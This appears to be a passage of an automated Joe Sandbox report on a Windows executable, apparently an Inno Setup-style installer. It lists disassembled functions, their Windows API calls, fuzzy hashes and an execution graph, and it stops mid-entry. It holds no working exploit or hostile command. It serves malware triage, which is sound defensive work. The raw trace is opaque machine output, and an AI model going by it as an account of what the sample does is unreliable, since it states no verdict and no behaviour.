                                                                                  • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                  • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                  • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,4Rt,?,?,?,00401800), ref: 004014B2
                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,4Rt,?,?,?,00401800), ref: 004014D7
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,4Rt,?,?,?,00401800), ref: 004014FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Alloc$Free
                                                                                  • String ID: 4Rt$DRt
                                                                                  • API String ID: 3668210933-192030282
                                                                                  • Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                                  • Instruction ID: d5dc587d839e3be782c9b7b9e1ff5a952950f17ebcccd457e3de013d7af40e21
                                                                                  • Opcode Fuzzy Hash: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                                  • Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                  • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CommandHandleLineModule
                                                                                  • String ID: @'s$U1hd.@
                                                                                  • API String ID: 2123368496-3023071883
                                                                                  • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                  • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                  • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                  • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID: )q@
                                                                                  • API String ID: 3660427363-2284170586
                                                                                  • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                  • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                  • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                  • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                  APIs
                                                                                  • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                  Strings
                                                                                  • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                  • Setup, xrefs: 00409CAD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                  • API String ID: 2030045667-3271211647
                                                                                  • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                  • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                  • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                  • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 1458359878-0
                                                                                  • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                  • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                  • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                  • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                  Execution Graph

                                                                                  Execution Coverage:15.9%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:4.2%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:66
                                                                                  execution_graph 50045 40cc44 50048 406f20 WriteFile 50045->50048 50049 406f3d 50048->50049 55995 492dec 55996 492e20 55995->55996 55997 492e22 55996->55997 55998 492e36 55996->55998 56131 447010 32 API calls 55997->56131 56002 492e72 55998->56002 56003 492e45 55998->56003 56000 492e2b Sleep 56001 492e6d 56000->56001 56005 403420 4 API calls 56001->56005 56008 492eae 56002->56008 56009 492e81 56002->56009 56004 44706c 32 API calls 56003->56004 56006 492e54 56004->56006 56007 4932e0 56005->56007 56010 492e5c FindWindowA 56006->56010 56014 492ebd 56008->56014 56015 492f04 56008->56015 56011 44706c 32 API calls 56009->56011 56012 4472ec 19 API calls 56010->56012 56013 492e8e 56011->56013 56012->56001 56017 492e96 FindWindowA 56013->56017 56132 447010 32 API calls 56014->56132 56020 492f60 56015->56020 56021 492f13 56015->56021 56019 4472ec 19 API calls 56017->56019 56018 492ec9 56133 447010 32 API calls 56018->56133 56023 492ea9 56019->56023 56030 492fbc 56020->56030 56031 492f6f 56020->56031 56136 447010 32 API calls 56021->56136 56023->56001 56025 492ed6 56134 447010 32 API calls 56025->56134 56026 492f1f 56137 447010 32 API calls 56026->56137 56029 492ee3 56135 447010 32 API calls 56029->56135 56041 492fcb 56030->56041 56042 492ff6 56030->56042 56141 447010 32 API calls 56031->56141 56033 492f2c 56138 447010 32 API calls 56033->56138 56035 492f7b 56142 447010 32 API calls 56035->56142 56037 492eee SendMessageA 56040 4472ec 19 API calls 56037->56040 56039 492f39 56139 447010 32 API calls 56039->56139 56040->56023 56045 44706c 32 API calls 56041->56045 56050 493005 56042->56050 56051 493044 56042->56051 56043 492f88 56143 447010 32 API calls 56043->56143 56048 492fd8 56045->56048 56047 492f44 PostMessageA 56140 447144 19 API calls 56047->56140 56053 492fe0 RegisterClipboardFormatA 56048->56053 56049 492f95 56144 447010 32 API calls 56049->56144 56146 447010 32 API calls 56050->56146 56059 493098 56051->56059 56060 493053 56051->56060 56056 4472ec 19 API calls 56053->56056 56056->56001 56057 492fa0 SendNotifyMessageA 56145 447144 19 API calls 56057->56145 56058 493011 56147 447010 32 API calls 56058->56147 56069 4930ec 56059->56069 56070 4930a7 56059->56070 56149 447010 32 API calls 56060->56149 56064 49301e 56148 447010 32 API calls 56064->56148 56065 49305f 56150 447010 32 API calls 56065->56150 56068 493029 SendMessageA 56073 4472ec 19 API calls 56068->56073 56078 4930fb 56069->56078 56079 49314e 56069->56079 56153 447010 32 API calls 56070->56153 56072 49306c 56151 447010 32 API calls 56072->56151 56073->56023 56074 4930b3 56154 447010 32 API calls 56074->56154 56077 493077 PostMessageA 56152 447144 19 API calls 56077->56152 56082 44706c 32 API calls 56078->56082 56086 49315d 56079->56086 56087 4931d5 56079->56087 56080 4930c0 56155 447010 32 API calls 56080->56155 56084 493108 56082->56084 56088 42e3a4 2 API calls 56084->56088 56085 4930cb SendNotifyMessageA 56156 447144 19 API calls 56085->56156 56090 44706c 32 API calls 56086->56090 56096 49320a 56087->56096 56097 4931e4 56087->56097 56091 493115 56088->56091 56094 49316c 56090->56094 56092 49312b GetLastError 56091->56092 56093 49311b 56091->56093 56098 4472ec 19 API calls 56092->56098 56095 4472ec 19 API calls 56093->56095 56157 447010 32 API calls 56094->56157 56099 493129 56095->56099 56106 493219 56096->56106 56107 49323c 56096->56107 56162 447010 32 API calls 56097->56162 56098->56099 56103 4472ec 19 API calls 56099->56103 56102 4931ee FreeLibrary 56163 447144 19 API calls 56102->56163 56103->56001 56104 49317f GetProcAddress 56108 49318b 56104->56108 56109 4931c5 56104->56109 56110 44706c 32 API calls 56106->56110 56114 49324b 56107->56114 56120 49327f 56107->56120 56158 447010 32 API calls 56108->56158 56161 447144 19 API calls 56109->56161 56112 493225 56110->56112 56118 49322d CreateMutexA 56112->56118 56164 48d220 32 API calls 56114->56164 56115 493197 56159 447010 32 API calls 56115->56159 56118->56001 56119 4931a4 56123 4472ec 19 API calls 56119->56123 56120->56001 56166 48d220 32 API calls 56120->56166 56122 493257 56124 493268 OemToCharBuffA 56122->56124 56125 4931b5 56123->56125 56165 48d238 19 API calls 56124->56165 56160 447144 19 API calls 56125->56160 56128 49329a 56129 4932ab CharToOemBuffA 56128->56129 56167 48d238 19 API calls 56129->56167 56131->56000 56132->56018 56133->56025 56134->56029 56135->56037 56136->56026 56137->56033 56138->56039 56139->56047 56140->56023 56141->56035 56142->56043 56143->56049 56144->56057 56145->56001 56146->56058 56147->56064 56148->56068 56149->56065 56150->56072 56151->56077 56152->56023 56153->56074 56154->56080 56155->56085 56156->56001 56157->56104 56158->56115 56159->56119 56160->56023 56161->56023 56162->56102 56163->56001 56164->56122 56165->56001 56166->56128 56167->56001 56168 41ee64 56169 41ee73 IsWindowVisible 56168->56169 56170 41eea9 56168->56170 56169->56170 56171 41ee7d IsWindowEnabled 56169->56171 56171->56170 56172 41ee87 56171->56172 56173 402648 18 API calls 56172->56173 56174 41ee91 EnableWindow 56173->56174 56174->56170 50050 499280 50108 403344 50050->50108 50052 49928e 50111 4056a0 50052->50111 50054 499293 50114 40632c GetModuleHandleA GetProcAddress 50054->50114 50058 49929d 50122 40995c 50058->50122 50389 4032fc 50108->50389 50110 403349 GetModuleHandleA GetCommandLineA 50110->50052 50113 4056db 50111->50113 50390 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50111->50390 50113->50054 50115 406348 50114->50115 50116 40634f GetProcAddress 50114->50116 50115->50116 50117 406365 GetProcAddress 50116->50117 50118 40635e 50116->50118 50119 406374 SetProcessDEPPolicy 50117->50119 50120 406378 50117->50120 50118->50117 50119->50120 50121 4063d4 6F9C1CD0 50120->50121 50121->50058 50391 409034 50122->50391 50389->50110 50390->50113 50463 408ccc 50391->50463 50394 4085ec GetSystemDefaultLCID 50398 408622 50394->50398 50395 408578 19 API calls 50395->50398 50396 403450 18 API calls 50396->50398 50397 406dfc 19 API calls 50397->50398 50398->50395 50398->50396 50398->50397 50402 408684 50398->50402 50399 403450 18 API calls 50399->50402 50400 406dfc 19 API calls 50400->50402 50401 408578 19 API calls 50401->50402 50402->50399 50402->50400 50402->50401 50403 408707 50402->50403 50539 403420 50403->50539 50406 408730 GetSystemDefaultLCID 50543 408578 GetLocaleInfoA 50406->50543 50409 403450 18 API calls 50410 408770 50409->50410 50411 408578 19 API calls 50410->50411 50412 408785 50411->50412 50413 408578 19 API calls 50412->50413 50414 4087a9 50413->50414 50549 4085c4 GetLocaleInfoA 50414->50549 50417 4085c4 GetLocaleInfoA 50418 4087d9 50417->50418 50419 408578 19 API calls 50418->50419 50420 4087f3 50419->50420 50421 4085c4 GetLocaleInfoA 50420->50421 50422 408810 50421->50422 50423 408578 19 API calls 50422->50423 50424 40882a 50423->50424 50425 403450 18 API calls 50424->50425 50426 408837 50425->50426 50427 408578 19 API calls 50426->50427 50428 40884c 50427->50428 50429 403450 18 API calls 50428->50429 50430 408859 50429->50430 50431 4085c4 GetLocaleInfoA 50430->50431 50432 408867 50431->50432 50433 408578 19 API calls 50432->50433 50434 408881 50433->50434 50435 403450 18 API calls 50434->50435 50436 40888e 50435->50436 50437 408578 19 API calls 50436->50437 50438 4088a3 50437->50438 50439 403450 18 API calls 50438->50439 50440 4088b0 50439->50440 50441 408578 19 API calls 50440->50441 50442 4088c5 50441->50442 50443 4088e2 50442->50443 50444 4088d3 50442->50444 50445 403494 4 API calls 50443->50445 50557 403494 50444->50557 50447 4088e0 50445->50447 50448 408578 19 API calls 50447->50448 50449 408904 50448->50449 50450 408921 50449->50450 50451 408912 50449->50451 50453 403400 4 API calls 50450->50453 50452 403494 4 API calls 50451->50452 50454 40891f 50452->50454 50453->50454 50551 403634 50454->50551 50464 408cd8 50463->50464 50471 406dfc LoadStringA 50464->50471 50484 4034e0 50471->50484 50474 403450 50475 403454 50474->50475 50478 403464 50474->50478 50477 4034bc 18 API calls 50475->50477 50475->50478 50476 403490 50480 403400 50476->50480 50477->50478 50478->50476 50534 402660 50478->50534 50481 403406 50480->50481 50482 40341f 50480->50482 50481->50482 50483 402660 4 API calls 50481->50483 50482->50394 50483->50482 50489 4034bc 50484->50489 50486 4034f0 50487 403400 4 API calls 50486->50487 50488 403508 50487->50488 50488->50474 50490 4034c0 50489->50490 50491 4034dc 50489->50491 50494 402648 50490->50494 50491->50486 50493 4034c9 50493->50486 50495 40264c 50494->50495 50497 402656 50494->50497 50500 402088 50495->50500 50496 402652 50496->50497 50511 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50496->50511 50497->50493 50497->50497 50501 40209c 50500->50501 50502 4020a1 50500->50502 50512 4019cc RtlInitializeCriticalSection 50501->50512 50504 4020c6 RtlEnterCriticalSection 50502->50504 50505 4020d0 50502->50505 50508 4020a5 50502->50508 50504->50505 50505->50508 50519 401f94 50505->50519 50508->50496 50509 4021f1 RtlLeaveCriticalSection 50510 4021fb 50509->50510 50510->50496 50511->50497 50513 4019f0 RtlEnterCriticalSection 50512->50513 50514 4019fa 50512->50514 50513->50514 50515 401a18 LocalAlloc 50514->50515 50516 401a32 50515->50516 50517 401a81 50516->50517 50518 401a77 RtlLeaveCriticalSection 50516->50518 50517->50502 50518->50517 50522 401fa4 50519->50522 50520 401fd0 50524 401ff4 50520->50524 50530 401db4 50520->50530 50522->50520 50522->50524 50525 401f0c 50522->50525 50524->50509 50524->50510 50526 40178c LocalAlloc VirtualAlloc VirtualFree VirtualFree VirtualAlloc 50525->50526 50527 401f1c 50526->50527 50528 401f29 50527->50528 50529 401e80 9 API calls 50527->50529 50528->50522 50529->50528 50531 401e02 50530->50531 50532 401dd2 50530->50532 50531->50532 50533 401d1c 9 API calls 50531->50533 50532->50524 50533->50532 50535 402664 50534->50535 50536 40266e 50534->50536 50535->50536 50538 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50535->50538 50536->50476 50536->50536 50538->50536 50540 403426 50539->50540 50541 40344b 50540->50541 50542 402660 4 API calls 50540->50542 50541->50406 50542->50540 50544 4085b1 50543->50544 50545 40859f 50543->50545 50547 403494 4 API calls 50544->50547 50546 4034e0 18 API calls 50545->50546 50548 4085af 50546->50548 50547->50548 50548->50409 50550 4085e0 50549->50550 50550->50417 50552 40363c 50551->50552 50553 4034bc 18 API calls 50552->50553 50554 40364f 50553->50554 50555 403450 18 API calls 50554->50555 50556 403677 50555->50556 50558 403498 50557->50558 50559 4034ba 50558->50559 50560 402660 4 API calls 50558->50560 50559->50447 50560->50559 56175 41fb68 56176 41fb71 56175->56176 56179 41fe0c 56176->56179 56178 41fb7e 56180 41fefe 56179->56180 56181 41fe23 56179->56181 56180->56178 56181->56180 56200 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 56181->56200 56183 41fe59 56184 41fe83 56183->56184 56185 41fe5d 56183->56185 56210 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 56184->56210 56201 41fbac 56185->56201 56189 41fe91 56191 41fe95 56189->56191 56192 41febb 56189->56192 56190 41fbac 10 API calls 56194 41fe81 56190->56194 56195 41fbac 10 API calls 56191->56195 56193 41fbac 10 API calls 56192->56193 56196 41fecd 56193->56196 56194->56178 56197 41fea7 56195->56197 56199 41fbac 10 API calls 56196->56199 56198 41fbac 10 API calls 56197->56198 56198->56194 56199->56194 56200->56183 56202 41fbc7 56201->56202 56203 41f94c 4 API calls 56202->56203 56204 41fbdd 56202->56204 56203->56204 56211 41f94c 56204->56211 56206 41fc25 56207 41fc48 SetScrollInfo 56206->56207 56219 41faac 56207->56219 56210->56189 56212 4181f0 56211->56212 56213 41f969 GetWindowLongA 56212->56213 56214 41f9a6 56213->56214 56215 41f986 56213->56215 56231 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 56214->56231 56230 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 56215->56230 56218 41f992 56218->56206 56220 41faba 56219->56220 56221 41fac2 56219->56221 56220->56190 56222 41fb01 56221->56222 56223 41faf1 56221->56223 56228 41faff 56221->56228 56233 417e58 IsWindowVisible ScrollWindow SetWindowPos 56222->56233 56232 417e58 IsWindowVisible ScrollWindow SetWindowPos 56223->56232 56224 41fb41 GetScrollPos 56224->56220 56227 41fb4c 56224->56227 56229 41fb5b SetScrollPos 56227->56229 56228->56224 56229->56220 56230->56218 56231->56218 56232->56228 56233->56228 56234 4205a8 56235 4205bb 56234->56235 56255 415b40 56235->56255 56237 420702 56238 420719 56237->56238 56262 4146e4 KiUserCallbackDispatcher 56237->56262 56241 420730 56238->56241 56263 414728 KiUserCallbackDispatcher 56238->56263 56239 420661 56260 420858 34 API calls 56239->56260 56247 420752 56241->56247 56264 420070 12 API calls 56241->56264 56244 4205f6 56244->56237 56244->56239 56248 420652 MulDiv 56244->56248 56245 42067a 56245->56237 56261 420070 12 API calls 56245->56261 56259 41a314 19 API calls 56248->56259 56251 420697 56252 4206b3 MulDiv 56251->56252 56253 4206d6 56251->56253 56252->56253 56253->56237 56254 4206df MulDiv 56253->56254 56254->56237 56256 415b52 56255->56256 56265 414480 56256->56265 56258 415b6a 56258->56244 56259->56239 56260->56245 56261->56251 56262->56238 56263->56241 56264->56247 56266 41449a 56265->56266 56269 410468 56266->56269 56268 4144b0 56268->56258 56272 40dcb4 56269->56272 56271 41046e 56271->56268 56273 40dd16 56272->56273 56274 40dcc7 56272->56274 56279 40dd24 56273->56279 56277 40dd24 33 API calls 56274->56277 56278 40dcf1 56277->56278 56278->56271 56280 40dd34 56279->56280 56282 40dd4a 56280->56282 56291 40e0ac 56280->56291 56307 40d5f0 56280->56307 56310 40df5c 56282->56310 56285 40d5f0 19 API calls 56286 40dd52 56285->56286 56286->56285 56287 40ddbe 56286->56287 56313 40db70 56286->56313 56289 40df5c 19 API calls 56287->56289 56290 40dd20 56289->56290 56290->56271 56292 40e97c 19 API calls 56291->56292 56294 40e0e7 56292->56294 56293 403778 18 API calls 56293->56294 56294->56293 56295 40e19d 56294->56295 56380 40d784 19 API calls 56294->56380 56381 40e090 19 API calls 56294->56381 56296 40e1c7 56295->56296 56297 40e1b8 56295->56297 56377 40ba34 56296->56377 56327 40e3d0 56297->56327 56302 40e1c5 56304 403400 4 API calls 56302->56304 56305 40e26c 56304->56305 56305->56280 56308 40ea18 19 API calls 56307->56308 56309 40d5fa 56308->56309 56309->56280 56414 40d4cc 56310->56414 56314 40df64 19 API calls 56313->56314 56315 40dba3 56314->56315 56316 40e97c 19 API calls 56315->56316 56317 40dbae 56316->56317 56318 40e97c 19 API calls 56317->56318 56319 40dbb9 56318->56319 56320 40dbd4 56319->56320 56321 40dbcb 56319->56321 56326 40dbd1 56319->56326 56423 40d9e8 56320->56423 56426 40dad8 33 API calls 56321->56426 56324 403420 4 API calls 56325 40dc9f 56324->56325 56325->56286 56326->56324 56328 40e406 56327->56328 56329 40e3fc 56327->56329 56331 40e521 56328->56331 56332 40e4a5 56328->56332 56333 40e506 56328->56333 56334 40e586 56328->56334 56335 40e448 56328->56335 56336 40e4e9 56328->56336 56337 40e479 56328->56337 56338 40e4cb 56328->56338 56370 40e46c 56328->56370 56383 40d450 19 API calls 56329->56383 56339 40d774 19 API calls 56331->56339 56391 40de34 19 API calls 56332->56391 56396 40e8a0 19 API calls 56333->56396 56345 40d774 19 API calls 56334->56345 56384 40d774 56335->56384 56394 40e9b8 19 API calls 56336->56394 56337->56370 56390 40d828 19 API calls 56337->56390 56393 40ddf4 19 API calls 56338->56393 56348 40e529 56339->56348 56341 403400 4 API calls 56349 40e5fb 56341->56349 56352 40e58e 56345->56352 56354 40e533 56348->56354 56364 40e52d 56348->56364 56349->56302 56350 40e4f4 56395 409d48 18 API calls 56350->56395 56351 40e4b0 56392 40d480 19 API calls 56351->56392 56357 40e592 56352->56357 56358 40e5ab 56352->56358 56397 40ea18 56354->56397 56366 40ea18 19 API calls 56357->56366 56403 40de34 19 API calls 56358->56403 56359 40e471 56389 40dee8 19 API calls 56359->56389 56360 40e454 56387 40de34 19 API calls 56360->56387 56368 40e531 56364->56368 56369 40ea18 19 API calls 56364->56369 56366->56370 56367 40e45f 56388 40e27c 19 API calls 56367->56388 56368->56370 56401 40de34 19 API calls 56368->56401 56373 40e554 56369->56373 56370->56341 56400 40d8b0 19 API calls 56373->56400 56374 40e576 56402 40e2e4 18 API calls 56374->56402 56409 40b9e0 56377->56409 56380->56294 56381->56294 56382 40d784 19 API calls 56382->56302 56383->56328 56385 40ea18 19 API calls 56384->56385 56386 40d77e 56385->56386 56386->56359 56386->56360 56387->56367 56388->56370 56389->56337 56390->56370 56391->56351 56392->56370 56393->56370 56394->56350 56395->56370 56396->56370 56404 40d790 56397->56404 56400->56368 56401->56374 56402->56370 56403->56370 56407 40d79b 56404->56407 56405 40d7d5 56405->56370 56407->56405 56408 40d7dc 19 API calls 56407->56408 56408->56407 56410 40b9f2 56409->56410 56411 40ba17 56409->56411 56410->56411 56413 40ba94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56410->56413 56411->56302 56411->56382 56413->56411 56415 40ea18 19 API calls 56414->56415 56416 40d4d9 56415->56416 56417 40d4ec 56416->56417 56421 40eb1c 19 API calls 56416->56421 56417->56286 56419 40d4e7 56422 40d468 19 API calls 56419->56422 56421->56419 56422->56417 56427 40ab8c 33 API calls 56423->56427 56425 40da10 56425->56326 56426->56326 56427->56425 52861 441408 52862 441411 52861->52862 52863 44141f WriteFile 52861->52863 52862->52863 52864 44142a 52863->52864 52865 40ce8c 52866 40ce94 52865->52866 52867 40cebe 52866->52867 52868 40cec2 52866->52868 52869 40ceb7 52866->52869 52871 40cec6 52868->52871 52872 40ced8 52868->52872 52878 406298 GlobalHandle GlobalUnlock GlobalFree 52869->52878 52877 40626c GlobalAlloc GlobalLock 52871->52877 52879 40627c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 52872->52879 52875 40ced4 52875->52867 52876 408ccc 19 API calls 52875->52876 52876->52867 52877->52875 52878->52867 52879->52875 56428 480de4 56429 451078 19 API calls 56428->56429 56430 480df8 56429->56430 56431 47fe90 35 API calls 56430->56431 56432 480e1c 56431->56432 52880 41364c SetWindowLongA GetWindowLongA 52881 4136a9 SetPropA SetPropA 52880->52881 52882 41368b GetWindowLongA 52880->52882 52886 41f3ac 52881->52886 52882->52881 52883 41369a SetWindowLongA 52882->52883 52883->52881 52891 415280 52886->52891 52898 423c1c 52886->52898 52992 423a94 52886->52992 52887 4136f9 52892 41528d 52891->52892 52893 4152f3 52892->52893 52895 4152e8 52892->52895 52897 4152f1 52892->52897 52999 424b9c 13 API calls 52893->52999 52895->52897 53000 41506c 60 API calls 52895->53000 52897->52887 52901 423c52 52898->52901 52915 423c73 52901->52915 53001 423b78 52901->53001 52902 423cfc 52904 423d03 52902->52904 52905 423d37 52902->52905 52903 423c9d 52906 423ca3 52903->52906 52907 423d60 52903->52907 52910 423d09 52904->52910 52947 423fc1 52904->52947 52913 423d42 52905->52913 52914 4240aa IsIconic 52905->52914 52911 423cd5 52906->52911 52912 423ca8 52906->52912 52908 423d72 52907->52908 52909 423d7b 52907->52909 52916 423d88 52908->52916 52917 423d79 52908->52917 53010 4241a4 11 API calls 52909->53010 52919 423f23 SendMessageA 52910->52919 52920 423d17 52910->52920 52911->52915 52936 423cee 52911->52936 52937 423e4f 52911->52937 52922 423e06 52912->52922 52923 423cae 52912->52923 52924 4240e6 52913->52924 52925 423d4b 52913->52925 52914->52915 52921 4240be GetFocus 52914->52921 52915->52887 52929 4241ec 11 API calls 52916->52929 53011 423b94 NtdllDefWindowProc_A 52917->53011 52919->52915 52920->52915 52927 423cd0 52920->52927 52960 423f66 52920->52960 52921->52915 52930 4240cf 52921->52930 53015 423b94 NtdllDefWindowProc_A 52922->53015 52931 423cb7 52923->52931 52932 423e2e PostMessageA 52923->52932 53032 424860 WinHelpA PostMessageA 52924->53032 52925->52927 52928 4240fd 52925->52928 52927->52915 53009 423b94 NtdllDefWindowProc_A 52927->53009 52934 424106 52928->52934 52935 42411b 52928->52935 52929->52915 53031 41f004 GetCurrentThreadId EnumThreadWindows 52930->53031 52941 423cc0 52931->52941 52942 423eb5 52931->52942 53016 423b94 NtdllDefWindowProc_A 52932->53016 52946 4244e4 19 API calls 52934->52946 53033 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 52935->53033 52936->52927 52948 423e1b 52936->52948 53005 423b94 NtdllDefWindowProc_A 52937->53005 52952 423cc9 52941->52952 52953 423dde IsIconic 52941->52953 52944 423ebe 52942->52944 52945 423eef 52942->52945 52943 423e49 52943->52915 53018 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52944->53018 53006 423b94 NtdllDefWindowProc_A 52945->53006 52946->52915 52947->52915 52965 423fe7 IsWindowEnabled 52947->52965 52959 424188 26 API calls 52948->52959 52951 